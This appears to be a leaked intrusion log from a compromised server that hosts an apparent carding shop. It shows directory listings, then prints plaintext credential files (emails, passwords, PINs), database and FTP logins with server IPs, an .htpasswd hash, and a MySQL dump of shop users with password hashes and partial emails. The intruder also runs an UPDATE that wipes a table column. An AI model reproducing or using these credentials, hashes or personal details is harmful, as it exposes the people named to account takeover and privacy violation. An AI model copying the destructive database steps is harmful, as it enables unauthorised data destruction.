+drwxrwx--- 5 mmgen www 512 Jun 11 15:22 dodo.st0re.cc +drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 st0re.cc +drwxrwx--- 3 mmgen www 512 Jan 26 2011 st0re.mmgen.st0re +drwxrwx--- 4 mmgen www 512 Dec 2 2010 st0re.morgen.w2c.ru +drwxrwx--- 2 mmgen www 10240 Oct 1 16:32 temp + +# cd dodo.st0re.cc + +# ls -la +total 96 +drwxrwx--- 5 mmgen www 512 Jun 11 15:22 . +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .. +drwxr-xr-x 2 mmgen www 512 Jun 11 15:21 css +drwxr-xr-x 4 mmgen www 2048 Jun 11 15:23 images +-rw-r--r-- 1 mmgen www 38106 Jun 11 15:23 index.html +drwxr-xr-x 2 mmgen www 512 Jun 11 15:21 js +# cd .. + +# cd st0re.mmgen.st0re + +# ls -la +total 16 +drwxrwx--- 3 mmgen www 512 Jan 26 2011 . +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .. +drwxr-xr-x 4 mmgen www 1536 Jan 26 2011 Neues Verzeichnis +-rw-r--r-- 1 mmgen www 1034 Dec 2 2010 index.html + +# cd "Neues Verzeichnis" + +# ls -la +total 237856 +drwxr-xr-x 4 mmgen www 1536 Jan 26 2011 . +drwxrwx--- 3 mmgen www 512 Jan 26 2011 .. +-rw-r--r-- 1 mmgen www 12326 Jan 26 2011 2.pl +-rw-r--r-- 1 mmgen www 3790 Jan 26 2011 2.png +-rw-r--r-- 1 mmgen www 697711 Jan 26 2011 22.png +-rw-r--r-- 1 mmgen www 164 Jan 26 2011 280539654158.kwm +-rw-r--r-- 1 mmgen www 1608 Jan 26 2011 280539654158.pwm +-rw-r--r-- 1 mmgen www 40882 Jan 26 2011 4.jpg +-rw-r--r-- 1 mmgen www 40505 Jan 26 2011 Banner4.jpg +-rw-r--r-- 1 mmgen www 1280 Jan 26 2011 Command Prompt.lnk +-rw-r--r-- 1 mmgen www 231 Jan 26 2011 Data.txt +-rw-r--r-- 1 mmgen www 900 Jan 26 2011 Daten.rtf +-rw-r--r-- 1 mmgen www 661429 Jan 26 2011 Enterpage.png +-rw-r--r-- 1 mmgen www 126738 Jan 26 2011 Enterpage_for_gamekings_eu_by_Frizzl3.jpg +-rw-r--r-- 1 mmgen www 1616155 Jan 26 2011 FILE0009.rar +-rw-r--r-- 1 mmgen www 952 Jan 26 2011 Fake Webcam (No Preview Mode).lnk +-rw-r--r-- 1 mmgen www 942 Jan 26 2011 Fake Webcam.lnk +-rw-r--r-- 1 mmgen www 1950 Jan 26 2011 FileZilla Client.lnk +-rw-r--r-- 1 mmgen www 1192 Jan 26 2011 Foxit Reader.lnk +-rw-r--r-- 1 mmgen www 10374720 Jan 26 2011 
MasterCard-Abrechnung.psd +-rw-r--r-- 1 mmgen www 1889 Jan 26 2011 Mozilla Firefox.lnk +-rw-r--r-- 1 mmgen www 22207 Jan 26 2011 Neues Textdokument.txt +-rw-r--r-- 1 mmgen www 137 Jan 26 2011 PSN2.txt +drwxr-xr-x 2 mmgen www 512 Jan 26 2011 Pack_Pixel_Arrows_01 +drwxr-xr-x 2 mmgen www 512 Jan 26 2011 Packstation +-rw-r--r-- 1 mmgen www 38207488 Jan 26 2011 PhotoshopCS4Portable.rar +-rw-r--r-- 1 mmgen www 1139 Jan 26 2011 SQLRIP.lnk +-rw-r--r-- 1 mmgen www 1884 Jan 26 2011 SendBlaster.lnk +-rw-r--r-- 1 mmgen www 2505 Jan 26 2011 Skype.lnk +-rw-r--r-- 1 mmgen www 318050 Jan 26 2011 St0re.jpg +-rw-r--r-- 1 mmgen www 4574766 Jan 26 2011 St0re.psd +-rw-r--r-- 1 mmgen www 679964 Jan 26 2011 St0re2.jpg +-rw-r--r-- 1 mmgen www 24560317 Jan 26 2011 St0reinfo - Shopdesign2.psd +-rw-r--r-- 1 mmgen www 1124 Jan 26 2011 TeamViewer 6.lnk +-rw-r--r-- 1 mmgen www 917 Jan 26 2011 WebMoney Keeper Classic 3.9.3.1.lnk +-rw-r--r-- 1 mmgen www 40467 Jan 26 2011 Werbung.png +-rw-r--r-- 1 mmgen www 3821 Jan 26 2011 btn2.png +-rw-r--r-- 1 mmgen www 68286 Jan 26 2011 btn2.psd +-rw-r--r-- 1 mmgen www 748437 Jan 26 2011 exported data.txt +-rw-r--r-- 1 mmgen www 1179 Jan 26 2011 head.gif +-rw-r--r-- 1 mmgen www 1789314 Jan 26 2011 head.psd +-rw-r--r-- 1 mmgen www 2084608 Jan 26 2011 hinten.png +-rw-r--r-- 1 mmgen www 791 Jan 26 2011 new 2.txt +-rw-r--r-- 1 mmgen www 1133 Jan 26 2011 new 5.txt +-rw-r--r-- 1 mmgen www 528 Jan 26 2011 new 9.txt +-rw-r--r-- 1 mmgen www 3318 Jan 26 2011 passwords.txt +-rw-r--r-- 1 mmgen www 145044 Jan 26 2011 pp.rar +-rw-r--r-- 1 mmgen www 31694808 Jan 26 2011 setup.exe +-rw-r--r-- 1 mmgen www 353781 Jan 26 2011 store.rar +-rw-r--r-- 1 mmgen www 74196 Jan 26 2011 title.gif +-rw-r--r-- 1 mmgen www 76765 Jan 26 2011 title_unreg.gif +-rw-r--r-- 1 mmgen www 2286399 Jan 26 2011 vorne.png +-rw-r--r-- 1 mmgen www 1087 Jan 26 2011 wrub4sts.lnk +# + +# cat passwords.txt +j_username=sny@vtxmail.ch +j_password=tino55 +pin=tino55 + +j_username=office@vertec-systems.com 
+j_password=121066 +pin= + + + + +j_username=DeineMutter@fickich.net +j_password=Diehuredie +pin=1234dudummestier + +j_username=HeyduFotze@magdich.net +j_password=ArschPo +pin=verarschmichnicht + +j_username=mybigmouth@web.de +j_password=andrea +pin=1950 + +j_username= +j_password= +pin= + +j_username=Rainer.Keberle@online.de +j_password=finepix4700 +pin= + +j_username=1746378 +j_password= +pin=q206mitte + + + +j_username=1746378 +j_password= +pin=q206mitte + +j_username=2187452 +j_password= +pin=q206mitte + +j_username=rababa@whitehouse.gov +j_password=dollar +pin=4711 + + + + +j_username=170734837 +j_password=express12 +pin= + +j_username=office@otto-stoeckl.com +j_password= +pin= + +j_username=170734837 +j_password=express +pin=12 + +j_username=nicole.dargel@gmx.de +j_password=Diving66 +pin= + +j_username=claudia.schultz@shell.com +j_password=chris1 +pin=4449 + +j_username=claudia.schultz@shell.com +j_password=chris1 +pin=4449 + +j_username=claudia.schultz@shell.com +j_password=chris1 +pin= + +j_username=734093 +j_password=19birgit +pin=7578 + +j_username=734093 +j_password=19nadine +pin=7578 + +j_username=734093 +j_password=birgit +pin=7578 + + + +j_username=sabina.mastrogiovanni@gmx.de +j_password=2dU8yU9qY4aC +pin=5942 + +j_username=sabina.mastrogiovanni@gmx.de +j_password=2dU8yU9qY4aC +pin=5942 + +j_username=Heldmann_C@web.de +j_password= +pin=6237 + +j_username=Heldmann_C@web.de +j_password= +pin=6237 + +j_username=benjamin.egermann@gmail.com +j_password=pcarmy +pin=6039 + +j_username=sabina.mastrogiovanni@gmx.de +j_password=2dU8yU9qY4aC +pin=5942 + +j_username= +j_password= +pin= + +j_username=danisahne8283@aol.com +j_password= +pin=masenfan + + +j_username=danisahne8282@aol.com +j_password=masenfan +pin=5556 + +j_username=danisahne8283@aol.com +j_password= +pin= + +j_username=danisahne8283@aol.com +j_password=masenfan +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= 
+pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + + +j_username=hannesvw@gmail.com +j_password= +pin=9016 + + + + +j_username=Thomas.Wunder@hv-s.de +j_password=Mannheim +pin= + + +j_username=mail@obu-hamburg.de +j_password=obu2009 +pin= + +j_username=mail@obu-hamburg.de +j_password=2493 +pin= + +j_username=mail@obu-hamburg.de +j_password=OBU2009 +pin= + +j_username=31971258 +j_password= +pin=2493 + + + + + +j_username=mario.hoefler@web.de +j_password=nutpen10 +pin= + +j_username=E.Giegler@web.de +j_password=Eschen +pin=5115 + +j_username=E.Giegler@web.de +j_password=Eschen +pin=5115 + + +j_username=mail@obu-hamburg.de +j_password=obu2009 +pin=2394 + +# cat Data.txt +MySQL +https://91.213.8.13/myadmin/ +$host = localhost +$user = Palshop +$pass = u5AunWox +$data = morgen_Palshop + +FTP: +91.213.8.26 +morgen +2Rysb2Kv + +5socks +http://admin.5socks.net/ +Morgen +Kzmv7QkvIf + + +0458-8466-1325-4447 UVszBT <<<< 50?# + +# cd .. + +# cd .. + +# cd st0re.morgen.w2c.ru + +# ls -la +total 16 +drwxrwx--- 4 mmgen www 512 Dec 2 2010 . +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .. 
+drwxr-xr-x 5 mmgen www 512 Dec 2 2010 admin +drwxr-xr-x 8 mmgen www 512 Dec 3 2010 content + +# cd admin + +# ls -la +total 56 +drwxr-xr-x 5 mmgen www 512 Dec 2 2010 . +drwxrwx--- 4 mmgen www 512 Dec 2 2010 .. +-rw-r--r-- 1 mmgen www 8621 Dec 2 2010 DE.lng +-rw-r--r-- 1 mmgen www 1546 Dec 2 2010 admin.php +-rw-r--r-- 1 mmgen www 708 Dec 3 2010 config.php +drwxr-xr-x 3 mmgen www 512 Dec 2 2010 designe +-rw-r--r-- 1 mmgen www 1008 Dec 2 2010 functions.php +drwxr-xr-x 4 mmgen www 512 Dec 2 2010 img +-rw-r--r-- 1 mmgen www 876 Dec 3 2010 index.php +drwxr-xr-x 2 mmgen www 512 Dec 2 2010 pages + +# cat config.php + + +# cd /home/mmgen/st0re.cc + +# ls -la +total 1522696 +drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 . +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .. +-rw-r--r-- 1 mmgen www 16950051 Sep 13 01:08 1.mp3 +-rw-r--r-- 1 mmgen www 941752 Sep 30 16:19 2.rar +-rw-r--r-- 1 mmgen www 144694 Jan 30 2011 3.jpeg +-rw-r--r-- 1 mmgen www 760708777 Sep 13 00:58 4.rar +-rw-r--r-- 1 mmgen www 30654 Feb 22 2011 Banner.jpg +-rw-r--r-- 1 mmgen www 40505 Feb 7 2011 Banner4.jpg +-rw-r--r-- 1 mmgen www 13347 Feb 3 2011 Jelly.jpg +-rw-r--r-- 1 mmgen www 53943 Feb 3 2011 Kamagra.png +drwxr-xr-x 3 mmgen www 512 Feb 21 2011 Neu +drwxr-xr-x 3 mmgen www 512 Jun 2 18:52 Ref +-rw-r--r-- 1 mmgen www 8967 Jul 17 16:04 Ukash.php +-rw-r--r-- 1 mmgen www 4756 Jan 27 2011 account.php +-rw-r--r-- 1 mmgen www 1532 Jan 27 2011 account_do.php +-rw-r--r-- 1 mmgen www 978 Jan 27 2011 add_basket.php +drwxr-xr-x 7 mmgen www 512 Mar 10 2011 admin +-rw-r--r-- 1 mmgen www 164100 Apr 10 16:10 banner.gif +-rw-r--r-- 1 mmgen www 2398 Jan 28 2011 basket.php +-rw-r--r-- 1 mmgen www 11921 Jul 21 23:44 cashin.php +-rw-r--r-- 1 mmgen www 2278 Apr 9 18:00 category.php +-rw-r--r-- 1 mmgen www 5223 Mar 10 2011 cc_modul.php +-rw-r--r-- 1 mmgen www 2265 Feb 8 2011 checkout.php +-rw-r--r-- 1 mmgen www 1471 Jan 27 2011 error.php +-rw-r--r-- 1 mmgen www 1007 Jan 27 2011 faq.php +-rw-r--r-- 1 mmgen www 1406 Apr 18 12:49 
favicon.ico +-rw-r--r-- 1 mmgen www 17594 Jan 27 2011 head.png +drwxr-xr-x 2 mmgen www 512 Aug 21 22:23 ico +-rw-r--r-- 1 mmgen www 7623 Jun 2 19:58 index.php +drwxr-xr-x 2 mmgen www 512 Apr 8 17:22 libs +-rw-r--r-- 1 mmgen www 886 Jan 27 2011 login.php +-rw-r--r-- 1 mmgen www 1177 Jan 27 2011 login_do.php +-rw-r--r-- 1 mmgen www 164 Jan 27 2011 logout.php +-rw-r--r-- 1 mmgen www 1879 Jan 27 2011 product.php +-rw-r--r-- 1 mmgen www 1319 Jan 27 2011 register.php +-rw-r--r-- 1 mmgen www 1827 Jan 27 2011 register_do.php +drwxr-xr-x 3 mmgen www 512 May 17 03:21 style +-rw-r--r-- 1 mmgen www 8011 Apr 13 21:31 support.php +-rw-r--r-- 1 mmgen www 2417 Apr 13 21:31 support_do.php + +# cd admin + +# ls -la +total 268 +drwxr-xr-x 7 mmgen www 512 Mar 10 2011 . +drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 .. +-rw-r--r-- 1 mmgen www 106 May 17 13:31 .htaccess +-rw-r--r-- 1 mmgen www 40 Jun 2 18:50 .htpasswd +-rw-r--r-- 1 mmgen www 8372 Feb 8 2011 category.php +drwxr-xr-x 2 mmgen www 512 Feb 8 2011 css +-rw-r--r-- 1 mmgen www 4599 Jan 27 2011 faq.php +drwxr-xr-x 6 mmgen www 512 Feb 8 2011 images +-rw-r--r-- 1 mmgen www 14618 Mar 10 2011 index.php +-rw-r--r-- 1 mmgen www 8549 Feb 13 2011 items.php +drwxr-xr-x 7 mmgen www 512 Feb 8 2011 js +drwxr-xr-x 3 mmgen www 512 Jan 27 2011 libs +-rw-r--r-- 1 mmgen www 7359 Mar 10 2011 modul.php +-rw-r--r-- 1 mmgen www 9007 Feb 8 2011 news.php +-rw-r--r-- 1 mmgen www 1256 Jan 27 2011 option.php +-rw-r--r-- 1 mmgen www 11703 Feb 8 2011 product.php +drwxr-xr-x 3 mmgen www 512 Jan 27 2011 style +-rw-r--r-- 1 mmgen www 18 Jan 29 2011 test.php +-rw-r--r-- 1 mmgen www 10040 Apr 9 19:18 tickets.php +-rw-r--r-- 1 mmgen www 12164 Feb 8 2011 user.php +-rw-r--r-- 1 mmgen www 17532 Feb 8 2011 voucher.php + +# cat .htaccess +AuthType Basic +AuthName "FUCK YOU" +AuthUserFile /home/mmgen/st0re.cc/admin/.htpasswd +Require valid-user + +# cat .htpasswd +Admin:$1$5KnX9ENu$aKqzHTLd5HpMqKqgnglUx/ + +# cd .. 
+ +# cd libs + +# ls -la +total 56 +drwxr-xr-x 2 mmgen www 512 Apr 8 17:22 . +drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 .. +-rw-r--r-- 1 mmgen www 2757 Jan 27 2011 class_bbcode.php +-rw-r--r-- 1 mmgen www 1561 Jan 28 2011 class_user.php +-rw-r--r-- 1 mmgen www 227 Jun 2 18:20 mysql_config.php +-rw-r--r-- 1 mmgen www 1312 Apr 11 00:18 psc_cashin.class.php +-rw-r--r-- 1 mmgen www 4383 Jul 19 21:35 ukash_cashin.class.php +-rw-r--r-- 1 mmgen www 7679 Apr 8 17:21 xxx_psc_cashin.class.php +# cat mysql_config.php + + +So let's check out their SHOP DB + +# mysql -u mmgen_shop -D mmgen_shop -p +Enter password: +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 89332 +Server version: 5.0.51a-log FreeBSD port: mysql-server-5.0.51a + +Type 'help;' or '\h' for help. Type '\c' to clear the buffer. + +mysql> SHOW DATABASES; ++--------------------+ +| Database | ++--------------------+ +| information_schema | +| mmgen_shop | +| test | ++--------------------+ +3 rows in set (0.00 sec) + +mysql> SHOW TABLES; ++----------------------+ +| Tables_in_mmgen_shop | ++----------------------+ +| shop_basket | +| shop_ccmodul | +| shop_coupon | +| shop_faq | +| shop_items | +| shop_navigation | +| shop_news | +| shop_options | +| shop_orders | +| shop_products | +| shop_tickets | +| shop_user | +| shop_voucher | ++----------------------+ +13 rows in set (0.00 sec) + +mysql> # LOLOLO let's rm password info +mysql> UPDATE shop_voucher SET infos = ""; +Query OK, 11 rows affected (0.00 sec) +Rows matched: 11 Changed: 11 Warnings: 0 + +mysql> SELECT * FROM shop_voucher; ++-------+--------+------+---------------------+-------+-------+------------+ +| payid | userid | type | code | infos | value | date | ++-------+--------+------+---------------------+-------+-------+------------+ +| 1872 | 10522 | 1 | 0905-1066-3280-8205 | | 10 | 
2011-09-30 | +| 1873 | 10522 | 1 | 0747-8763-8777-7583 | | 10 | 2011-09-30 | +| 1874 | 10482 | 1 | 0170-8844-2643-6121 | | 10 | 2011-09-30 | +| 1875 | 10161 | 1 | 0662-3887-5897-6736 | | 21 | 2011-09-30 | +| 1877 | 8885 | 1 | 0795-2181-5472-4078 | | 10 | 2011-09-30 | +| 1878 | 10575 | 1 | 0508-5218-3536-7066 | | 10 | 2011-09-30 | +| 1869 | 10568 | 1 | 0725-8889-7048-6149 | | 10 | 2011-09-30 | +| 1870 | 10300 | 1 | 0677-5871-1938-8696 | | 10 | 2011-09-30 | +| 1871 | 10557 | 1 | 0570-2670-2925-4453 | | 100 | 2011-09-30 | +| 1402 | 5356 | 0 | | | 0 | 2011-07-21 | +| 1403 | 9652 | 0 | | | 0 | 2011-07-21 | ++-------+--------+------+---------------------+-------+-------+------------+ +11 rows in set (0.00 sec) + +mysql> # Now how about we check who actually buys shit +mysql> SELECT * FROM shop_user WHERE credits > 5; ++--------+---------------+----------------------------------+--------------+---------+--------+---+ +| userid | username | password | icq | credits | status | x | ++--------+---------------+----------------------------------+--------------+---------+--------+---+ +| 6 | J0hn.X3r | dbd570d9cfb7ee0473a7890e641a1f45 | 898437 | 20 | 0 | 0 | +| 189 | Arma | 93f5d2a618cde4160d3eb8f748221f91 | arma@hush.ai | 10 | 0 | 0 | +| 208 | iron.t | 9b630edecc947a5f9e5d4ca59462663f | iron.t@hotbo | 15 | 0 | 0 | +| 514 | ngized | 3dcbb61d6599e4cbe89510c28f324f66 | camora18@web | 10 | 0 | 0 | +| 571 | basha | 1618a9fe1c58f2bedd2fdccefaa6da21 | basha444@web | 9 | 0 | 0 | +| 625 | stefgexp | 55132608a2fb68816bcd3d1caeafc933 | c.k.007@web. | 40 | 0 | 0 | +| 794 | Tanoths | b5042eac66b4bdb8c6e42560f964ed3c | max@lilium-n | 23 | 0 | 0 | +| 804 | TB4ever | 4be5ce67d73fb9b6dda4d91d45387d16 | jjstyler@liv | 7 | 0 | 0 | +| 945 | Sven | 3dd19f98fd4adb12e6cee669341381aa | vb-sveiven@w | 10 | 0 | 0 | +| 973 | binglly | 1a7384005bd77b151e11d58ac79da095 | binglly@web. 
| 10 | 0 | 0 | +| 1120 | etrax | 4f0cb9262f0a0fdab6c9db4c122024c2 | etrax@secure | 10 | 0 | 0 | +| 1174 | JUMPhil | 40d914022aca12c372304e1cf2e89b88 | 836499 | 9 | 0 | 0 | +| 1195 | m0rpheus | 06aa90cb7e31b1de837cdfd4b837163c | m0rpheusz@o2 | 10 | 0 | 0 | +| 1207 | HansMeier | 44354626326b1cd44cce845e8393ac0d | hansmeierfor | 6 | 0 | 0 | +| 1353 | dr.mouse | b5ba41ed05b0b197546e2a4283af77ae | gucci23@hush | 7 | 0 | 0 | +| 1691 | play | 0c2192030b08d26b06b073eef083548a | b4252353@ugg | 17 | 0 | 0 | +| 1771 | fros | e0e93346794bf614a1f02254d9d8b21e | ritho.ritho@ | 10 | 0 | 0 | +| 1810 | melvyn10 | 41df744f22aa3d7f81983a77e2899829 | melvyn10@081 | 15 | 0 | 0 | +| 1941 | phyntox | 33d42d1eb34ec443704571b0ce34193e | phyntox@goog | 10 | 0 | 0 | +| 1967 | fatal | 592b36d730c592cce0eebe1731d143ec | fatal3x@live | 7 | 0 | 0 | +| 2010 | Dodo | d6d963cedb8dbc1ee57f271e942fbadd | bennibluemch | 7 | 0 | 0 | +| 2301 | Blizzardo | 15b29ffdce66e10527a65bc6d71ad94d | blizzardfert | 10 | 0 | 0 | +| 2415 | ecstasy | 887e1733037e9af10502b8bf923ad202 | Riehm93@onli | 6 | 0 | 0 | +| 2478 | basics | cf7303a964a1682deeb3db90fbe3aeab | admin@mail-s | 6 | 0 | 0 | +| 2630 | Stehlampe | db1527f7ecd3dd38f5de94e38cae2c53 | waswillstdud | 20 | 0 | 0 | +| 2641 | mettwurst | 245a93ee61572bdda20c145374192603 | mettwurst@sa | 8 | 0 | 0 | +| 2677 | Syntax | 068d03ef735f14d75cd78d0ad5e427a3 | psych0tik@li | 13 | 0 | | +| 2696 | seife123 | a2327b1893edf0719cc1f29b8d807957 | azzzze@yahoo | 10 | 0 | 0 | +| 2703 | fam0us | 8f036369a5cd26454949e594fb9e0a2d | ifam0us@hotm | 20 | 0 | 0 | +| 2731 | Borni81 | 8d8e4a0f1607ecb8790bce4d03331749 | bornito@live | 6 | 0 | 0 | +| 2763 | termi | 573bd983f1a92bb6cf8b535919e3a728 | Hans.olaf1@w | 6 | 0 | 0 | +| 2827 | O.M.A. | 6b8d556a2c4e1a17c57c4019d58377f7 | Mueller_Simo | 7 | 0 | 0 | +| 2861 | Epicfisch | 5785adb4d56e4dd0e2732c26ccc3a0ca | admin@stream | 10 | 0 | 0 | +| 2960 | daunilein | 0e1ffc254643ad1b3a006a347146282f | downi@downi. 
| 6 | 0 | 0 | +| 3101 | Pr3dator | 65a5a3d88782ceb6af221234670ec8fb | christian.ri | 13 | 0 | 0 | +| 3135 | hassan3 | 8ce4ffbdd4b371c255be75734f26cd72 | guzter@ahoo. | 10 | 0 | 0 | +| 3208 | maddox | 4a3ef4824d67af46ea57a39b72dea7df | a3351613@owl | 8 | 0 | 0 | +| 3256 | k00ky | 649f7f3295eb1163604ce906b6a6c498 | k00ky@hotmai | 9 | 0 | 0 | +| 3266 | 1337man | f29f5f0849fec2e6bc1c10de788410fa | roflfastlola | 11 | 0 | 0 | +| 3321 | djinns | c316236440037c0a621d592222708b72 | djinnsrs@goo | 8 | 0 | 0 | +| 3433 | fluxay | 64d1f88b9b276aece4b0edcc25b7a434 | dir@mailinat | 70 | 0 | 0 | +| 3628 | BOMBER | 8e26756ab1075b72dd82965c3d67c162 | bersch5555@w | 6 | 0 | 0 | +| 3731 | testuser0 | 68b62823ed173ad3bed0ce700d556b2a | b999347@owlp | 25 | 0 | 0 | +| 3829 | Skywalker | 077efa5fc07874cb04bd359845314743 | b1459562@owl | 10 | 0 | 0 | +| 3905 | Plasmasmog | ba9912907e468a911de722cd811b99b2 | Plasmasmog@m | 10 | 0 | 0 | +| 3951 | master1234 | bffdd53cd1557a14c84b6f42f2012187 | forfreemovie | 10 | 0 | 0 | +| 4038 | !XSS | 5b84d7e9450f523d263a1e2844d333da | xss-xss@Safe | 17 | 0 | 0 | +| 4114 | sh0x | 7e573aedbe6d321228de54fcacee7ebd | leandroking@ | 6 | 0 | 0 | +| 4121 | slice | c53c7a272390264c5e6beddcc410daa5 | esel@yahoo.d | 10 | 0 | 0 | +| 4140 | Dennske | f8eb6ce796e56b0260d9e77c6e057a20 | wccrew@web.d | 10 | 0 | 0 | +| 4144 | -Bounter- | 2fec358d161f20e1d51e24641d76312f | dreamy@warez | 10 | 0 | 0 | +| 4470 | Phantonym | 95abaa72bd229ec8f058519bb4bcfe87 | Phantonym@hu | 11 | 0 | 0 | +| 4474 | CyberTT | df53ca268240ca76670c8566ee54568a | a1679852@bof | 6 | 0 | 0 | +| 4476 | Getter | 530ea1472e71035353d32d341ecf6343 | a1682682@bof | 50 | 0 | 0 | +| 4808 | ceres2 | dd4df322be3679fc422ab3d45fc97e96 | ceres@imails | 13 | 0 | 0 | +| 4846 | check | 3756dd32ed2706bb3b6fc004b0e4ef80 | senmobiles@h | 8 | 0 | 0 | +| 4890 | lgdavid | 5daec48bdfda7423e079b99c80c13ed1 | david.wang20 | 7 | 0 | 0 | +| 4919 | stronger87 | ea110dfdeb4b966c81f7d786df7b1192 | dirkbischof@ | 10 | 0 | 0 | 
+| 4944 | burberry | 55f9c405bd87ba23896f34011ffce8da | burberry1337 | 6 | 0 | 0 | +| 5088 | L4x1337 | 7518f76db987755dbb01c52e177ba134 | 591238155 | 8 | 0 | 0 | +| 5126 | Neon | ab64f71b84891bc31fe85512d35716a8 | neon19881@we | 10 | 0 | 0 | +| 5401 | schlecker | cf14f069b4e041d13f50361dd54b9a33 | sjsj@web.de | 8 | 0 | 0 | +| 5446 | sexy1337 | e10adc3949ba59abbe56e057f20f883e | sadsadasdmer | 9 | 0 | 0 | +| 5642 | firelabs | 076c91ca1a80a49970a3e094ef5954cf | fuckthatbitc | 10 | 0 | 0 | +| 5727 | 2t-power | 0df174153bd462f50c728006d9d1c704 | eiermann@hus | 6 | 0 | 0 | +| 6079 | pete | 620209aea87f7bae2bd2445d094ba275 | karl-otto3@w | 20 | 0 | 0 | +| 6092 | accored | bc47508edab07c1a0082c714fdc08eab | acc0r3d@yaho | 18 | 0 | 0 | +| 6167 | mercury | 98169b656c826331d6e9d5e334ca7be8 | fakemail@bla | 10 | 0 | 0 | +| 6183 | Roxas | d412a68fd7624bfe220f55f53c26f5a7 | Roxas_1991@g | 20 | 0 | 0 | +| 6187 | Redbullfly | 3a82ca9ca9bfe5db9d9eda406c13ac61 | Redbullfly@g | 8 | 0 | 0 | +| 6263 | Madd1n | e2a2a6d692a27773a9da52f7e82cfde7 | martinkieser | 6 | 0 | 0 | +| 6465 | terror | 9a1b0d5d2d14b7272183d51fe5914f25 | b1245111@lhs | 12 | 0 | 0 | +| 6549 | drupp | e19d5cd5af0378da05f63f891c7467af | drupp88@goog | 53 | 0 | 0 | +| 6590 | _wayne | dc8996397be86e49cb56fd6face00c7f | mkoch@live.d | 6 | 0 | 0 | +| 6667 | krillewurm | 06e0274429fc435c0335237c0006f13c | easy-riderz@ | 25 | 0 | 0 | +| 6689 | sundy | 263f55f9f491876ebe21af13c2ee4589 | ra.klaus.sta | 7 | 0 | 0 | +| 6772 | 1311 | 2aed094745c811516aea636e52015bc8 | 2010@9y.com | 10 | 0 | 0 | +| 6820 | drbob | edfff284ca91b5676d8caa85f0cfd1df | BlackDesire2 | 20 | 0 | 0 | +| 6885 | Lankabel | 4297f44b13955235245b2497399d7a93 | 123@123.123 | 35 | 0 | | +| 6953 | fr34c10 | 200820e3227815ed1756a6b531e7e0d2 | festner@mail | 10 | 0 | | +| 7040 | Cysis | 984c8c7b5d1d358c1470b1a2f81cdd3b | 4216SD@gmail | 40 | 0 | | +| 7042 | Fire | e94e346e5bb49449d6d607939ddbf63c | cyler@hotmai | 8 | 0 | | +| 7072 | drbob100 | 
8faddb27516de448b4f7a434b5a7130a | Blackddeess@ | 20 | 0 | | +| 7105 | runner91 | 8a7d489dbea2c6d8ad710b47ea68bc05 | malli-2006@w | 7.5 | 0 | | +| 7190 | jacov | f30d05ead11bea743d583e4282e304f6 | n0b0dy.fh@we | 7 | 0 | | +| 7193 | kratos1 | 59779937922f0264885e4f871257be48 | fgikto@googl | 7 | 0 | | +| 7227 | s30s | 5103c1995af9f7fc6751de332bcfdfd3 | xc0ree@cust. | 7 | 0 | | +| 7603 | fws | 73cb82e5496bfc9e4a6bc70ea2826e56 | ao@f-ws.de | 32 | 0 | | +| 7803 | CodeRed | e89b7c5cc238c5871ceeafe46d3d3154 | CodeRed94@ho | 6 | 0 | | +| 7827 | liviu | 65399351c23e646ae6ad68c938015c14 | zut@wet.de | 6 | 0 | | +| 7887 | Anything | 9f4633f632153c74bcddcbf9c1d2fbed | 113377 | 9 | 0 | | +| 7899 | piren20 | cc03e747a6afbbcbf8be7668acfebee5 | mh.zeh@web.d | 10 | 0 | | +| 7925 | sdffsf | c02711d20a521eb8d1e5aeefb6bbecab | dfds@sd.de | 7 | 0 | | +| 8114 | sTiNN | 745c0ccdb25262e3a17afe9fd6456a5c | stinn@live.d | 6 | 0 | | +| 8122 | bigdady | 9933fb405b690fb59015b8981e09e671 | 621178350 | 10 | 0 | | +| 8249 | freestyl | 2968da776da97fdd7d4910189411804e | as7da9d@gmx. 
| 20 | 0 | | +| 8324 | kamel | e73e1bd2feb22b75c0ec0cacfd0b9d25 | 81023871 | 13 | 0 | | +| 8340 | iphonejumper | 5db9e40fd1ae010e435884cedbfde349 | | 7 | 0 | | +| 8408 | joe321 | f36e8a3b77970d55a984672972555c40 | | 35 | 0 | | +| 8414 | Crackfox | 10b43971a8295f3720f38fbcdd9d6ac6 | | 6 | 0 | | +| 8470 | shoxx12 | 1e45690858e3dfdeebbd67eb5db2653b | | 5.5 | 0 | | +| 8493 | alexander | dd22141acb5ea065acd5ed773729c98f | 000000 | 30 | 0 | | +| 8554 | hurens0hn | 08ba21f5a9f192e3114ce9c3d29c0f8f | 383051368 | 25 | 0 | | +| 8580 | Bester12 | 8e2a99e1e5e356f5b9b874c8d9d83c79 | 456 | 40 | 0 | | +| 8627 | Kleedyyy | 8d0c8f9d1a9539021fda006427b993b9 | | 7 | 0 | | +| 8645 | Energie | ea110dfdeb4b966c81f7d786df7b1192 | | 7 | 0 | | +| 8691 | JimPanse | f56a8901702b2c279c065f2ca15890ec | | 8 | 0 | | +| 8744 | cubee | 4a3ef4824d67af46ea57a39b72dea7df | | 7 | 0 | | +| 8762 | Dodel | 5657c76ad9a05ea0d9899f94dc4121e9 | | 8 | 0 | | +| 8826 | kuni77 | 22f3555c832cde0134c65e9cb44424ee | 615664295 | 7 | 0 | | +| 8866 